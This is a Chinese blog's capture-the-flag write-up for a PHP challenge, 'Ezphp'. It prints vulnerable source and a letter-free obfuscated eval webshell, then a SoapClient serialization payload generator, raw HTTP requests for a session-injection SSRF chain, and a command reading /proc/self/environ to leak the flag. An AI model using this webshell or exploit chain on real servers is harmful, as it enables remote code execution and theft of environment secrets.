inanb

Ezphp

index:

<?php
highlight_file(__FILE__);
$b = 'implode';
call_user_func($_GET['f'], $_POST);
session_start();
if (isset($_GET['name'])) {
    $_SESSION['name'] = $_GET['name'];
}
var_dump($_SESSION);
$a = array(reset($_SESSION), 'welcome');
call_user_func($b, $a);
?>

flag.php

<?php
session_start();
highlight_file(__FILE__);
echo 'only localhost can get shell!';
if ($_SERVER["REMOTE_ADDR"] === "127.0.0.1"){
    $shell=$_GET['i'];
    if(preg_match('/[a-zA-Z0-0]/i',$shell)){
        die('hacker');
    }
    eval($shell);
}
?>
only localhost can get shell!

与bestphp's revenge大体相同，注入session，反序列化soap进行SSRF打到flag.php

flag.php 对shell内容有要求，找一个shell：

<?php
$__=[];
$_=($__==$__);
$__=~(融);
$___=$__[$_];
$__=~(匆);
$___.=$__[$_].$__[$_];
$__=~(随);
$___.=$__[$_];
$__=~(千);
$___.=$__[$_];
$__=~(苦);
$___.=$__[$_];
$____=~(~(_));
$__=~(帿);
$____.=$__[$_];
$__=~(庿);
$____.=$__[$_];
$__=~(站);
$____.=$__[$_];
$_=$$____;
$___($_[_]);
//相当于 eval($_GET[_])

借助session的打印，将命令执行的结果保存在session中，多次尝试找到/proc/self/environ

poc生成：

<?php
$url = 'http://127.0.0.1/flag.php?_=$_SESSION["hahaha"]=`cat /proc/self/environ`&i=$__=[]; $_=($__==$__); $__=~(融); $___=$__[$_]; $__=~(匆); $___.=$__[$_].$__[$_]; $__=~(随); $___.=$__[$_]; $__=~(千); $___.=$__[$_]; $__=~(苦); $___.=$__[$_]; $____=~(~(_)); $__=~(帿); $____.=$__[$_]; $__=~(庿); $____.=$__[$_]; $__=~(站); $____.=$__[$_]; $_=$$____; $___($_[_]);';
$b = new SoapClient(null, array('uri' => $url, 'location' => $url));
$a = serialize($b);
$a = str_replace('^^', "\r\n", $a);
echo "|" . urlencode($a);
?>

请求一：

POST /index.php?f=session_start&name=|O%3A10%3A%22SoapClient%22%3A3%3A%7Bs%3A3%3A%22uri%22%3Bs%3A362%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%3F_%3D%24_SESSION%5B%22hahaha%22%5D%3D%60cat+%2Fproc%2Fself%2Fenviron%60%26i%3D%24__%3D%5B%5D%3B+%24_%3D%28%24__%3D%3D%24__%29%3B+%24__%3D%7E%28%E8%9E%8D%29%3B+%24___%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E5%8C%86%29%3B+%24___.%3D%24__%5B%24_%5D.%24__%5B%24_%5D%3B+%24__%3D%7E%28%E9%9A%8F%29%3B+%24___.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E5%8D%83%29%3B+%24___.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E8%8B%A6%29%3B+%24___.%3D%24__%5B%24_%5D%3B+%24____%3D%7E%28%7E%28_%29%29%3B+%24__%3D%7E%28%E5%B8%BF%29%3B+%24____.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E5%BA%BF%29%3B+%24____.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E7%AB%99%29%3B+%24____.%3D%24__%5B%24_%5D%3B+%24_%3D%24%24____%3B+%24___%28%24_%5B_%5D%29%3B%22%3Bs%3A8%3A%22location%22%3Bs%3A362%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%3F_%3D%24_SESSION%5B%22hahaha%22%5D%3D%60cat+%2Fproc%2Fself%2Fenviron%60%26i%3D%24__%3D%5B%5D%3B+%24_%3D%28%24__%3D%3D%24__%29%3B+%24__%3D%7E%28%E8%9E%8D%29%3B+%24___%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E5%8C%86%29%3B+%24___.%3D%24__%5B%24_%5D.%24__%5B%24_%5D%3B+%24__%3D%7E%28%E9%9A%8F%29%3B+%24___.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E5%8D%83%29%3B+%24___.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E8%8B%A6%29%3B+%24___.%3D%24__%5B%24_%5D%3B+%24____%3D%7E%28%7E%28_%29%29%3B+%24__%3D%7E%28%E5%B8%BF%29%3B+%24____.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E5%BA%BF%29%3B+%24____.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E7%AB%99%29%3B+%24____.%3D%24__%5B%24_%5D%3B+%24_%3D%24%24____%3B+%24___%28%24_%5B_%5D%29%3B%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D HTTP/1.1
Host: 8.130.177.112:15294
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Cookie: PHPSESSID=aaa
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

serialize_handler=php_serialize

请求二：

POST /index.php?f=extract HTTP/1.1
Host: 8.130.177.112:15294
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=aaa
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

b=call_user_func

多次访问回显参数：

  ["PHPSESSID"]=>
  array(3) {
    [0]=>
    string(26) "7imbbmbj5nbrpl150k0t4j1bm5"
    [1]=>
    string(1) "/"
    [2]=>
    string(9) "127.0.0.1"
  }

请求三：

GET /index.php HTTP/1.1
Host: 8.130.177.112:15294
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=7imbbmbj5nbrpl150k0t4j1bm5
Accept-Language: zh-CN,zh;q=0.9
Connection: close

回显：

array(1) {
  ["hahaha"]=>
  string(918) "PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi USER=www-data HOSTNAME=b39c81750af6 PHP_INI_DIR=/usr/local/etc/php SHLVL=2 HOME=/home/www-data PHP_LDFLAGS=-Wl,-O1 -Wl,--hash-style=both -pie PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 PHP_MD5= PHP_VERSION=7.0.33 GPG_KEYS=1A4E8B7277C42E53DBA9C7B9BCAA30EA9C0D5763 6E4F6AB321FDC07F2C332E3AC2BF0BC433CFC8B3 PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 PHP_ASC_URL=https://secure.php.net/get/php-7.0.33.tar.xz.asc/from/this/mirror PHP_URL=https://secure.php.net/get/php-7.0.33.tar.xz/from/this/mirror PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin PHPIZE_DEPS=autoconf 		dpkg-dev dpkg 		file 		g++ 		gcc 		libc-dev 		make 		pkgconf 		re2c PWD=/var/www/html PHP_SHA256=ab8c5be6e32b1f8d032909dedaaaa4bbb1a209e519abb01a52ce3914f9a13d96 FLAG=flag{ISEC-c59691c19713573fa23f0876257cfd7c} "
}

FLAG=flag{ISEC-c59691c19713573fa23f0876257cfd7c}

Ezphp

喜欢这篇文章？打赏一下作者吧

链接

最新文章

分类

归档

标签

订阅更新